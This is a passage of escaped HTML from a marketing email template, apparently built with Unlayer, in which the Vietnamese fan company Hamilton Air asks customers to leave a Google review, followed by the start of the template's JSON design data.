src=\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1595747900373-ssss.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:28px 33px 25px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #444444; line-height: 200%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 200%;\\\"><span style=\\\"font-size: 22px; line-height: 44px;\\\">Hi,<\\/span><br \\/><span style=\\\"font-size: 16px; line-height: 32px;\\\">Thank you again for choosing us for your lorem ipsum dolor. <\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 200%;\\\"><span style=\\\"font-size: 16px; line-height: 32px;\\\">If you were happy with the efficiency of the service could I ask that you leave us some brief feedback on your experience via the link below.<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 0px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"\\\" style=\\\"height:49px; v-text-anchor:middle; width:248px;\\\" arcsize=\\\"81.5%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#272362\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Open Sans\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Open Sans\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #272362; border-radius: 40px;-webkit-border-radius: 40px; -moz-border-radius: 40px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:15px 44px;line-height:120%;\\\"><span style=\\\"font-size: 16px; line-height: 19.2px;\\\"><strong><span style=\\\"line-height: 19.2px; font-size: 16px;\\\">Review us on Google<\\/span><\\/strong><\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 10px 10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1595748338131-FWsY1nA.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 35%;max-width: 203px;\\\" width=\\\"203\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:18px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"84%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #d8d0d0;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:19px 33px 40px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-family: \'Source Sans Pro\',sans-serif; font-size: 28px; font-weight: 700; color: #236fa1; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 24px; line-height: 39.2px; font-family: \'Source Sans Pro\', sans-serif;\\\">Kh\\u00f4ng Ch\\u1ec9 L\\u00e0 M\\u00e1t - M\\u00e0 C\\u00f2n H\\u01a1n Th\\u1ebf N\\u1eefa<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #272362;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #272362;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:30px 4px 4px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div align=\\\"center\\\">\\r\\n  <div style=\\\"display: table; max-width:254px;\\\">\\r\\n  <!--[if (mso)|(IE)]><table width=\\\"254\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"border-collapse:collapse;\\\" align=\\\"center\\\"><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"border-collapse:collapse; mso-table-lspace: 0pt;mso-table-rspace: 0pt; width:254px;\\\"><tr><![endif]-->\\r\\n  \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 19px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 19px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\" \\\" title=\\\"Facebook\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-white\\/facebook.png\\\" alt=\\\"Facebook\\\" title=\\\"Facebook\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 19px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 19px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\" \\\" title=\\\"Twitter\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-white\\/twitter.png\\\" alt=\\\"Twitter\\\" title=\\\"Twitter\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 19px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 19px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\" \\\" title=\\\"LinkedIn\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-white\\/linkedin.png\\\" alt=\\\"LinkedIn\\\" title=\\\"LinkedIn\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 19px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 19px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\" \\\" title=\\\"Instagram\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-white\\/instagram.png\\\" alt=\\\"Instagram\\\" title=\\\"Instagram\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 0px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\" \\\" title=\\\"YouTube\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-white\\/youtube.png\\\" alt=\\\"YouTube\\\" title=\\\"YouTube\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:23px 40px 10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #b8b8b8; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\">T\\u1ed5ng \\u0111\\u00e0i b\\u00e1n h\\u00e0ng: 028.73033369<br \\/>EMAIL: sale@hogiaphat.vn\\u00a0<br \\/>SR Th\\u1ee7 \\u0110\\u1ee9c: 184 Tr\\u1ea7n L\\u1ef1u, An Ph\\u00fa, Tp Th\\u1ee7 \\u0110\\u1ee9c, Tp HCM<\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 140%;\\\">SR Qu\\u1eadn 7: Happy Valley, 812 Nguy\\u1ec5n V\\u0103n Linh, T\\u00e2n Phong, Qu\\u1eadn 7, Tp HCM<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:19px 19px 0px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"91%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #616888;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:15px 40px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #bbbbbb; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 12px; line-height: 16.8px;\\\">\\u00a9Hamiton Air Fans\\u2122. All Rights Reserved.<\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 12px; line-height: 16.8px;\\\">C\\u00d4NG TY C\\u1ed4 PH\\u1ea6N C\\u00d4NG NGH\\u1ec6 HAMILTON AIR<br \\/>MST: 0315778682 do s\\u1edf KH v\\u00e0 \\u0111\\u1ea7u t\\u01b0 Tp.HCM.\\u00a0<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n    <!--[if (mso)|(IE)]><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n  <\\/tbody>\\r\\n  <\\/table>\\r\\n  <!--[if mso]><\\/div><![endif]-->\\r\\n  <!--[if IE]><\\/div><![endif]-->\\r\\n<\\/body>\\r\\n\\r\\n<\\/html>\\r\\n\"', '\"{\\\"counters\\\":{\\\"u_row\\\":5,\\\"u_column\\\":6,\\\"u_content_text\\\":6,\\\"u_content_image\\\":3,\\\"u_content_button\\\":1,\\\"u_content_social\\\":1,\\\"u_content_divider\\\":2},\\\"body\\\":{\\\"id\\\":\\\"nY2UpNg7xs\\\",\\\"rows\\\":[{\\\"id\\\":\\\"CvMouKqZza\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"MIyWoeK0P3\\\",\\\"contents\\\":[{\\\"id\\\":\\\"wkMmc2BYL9\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"40px 10px 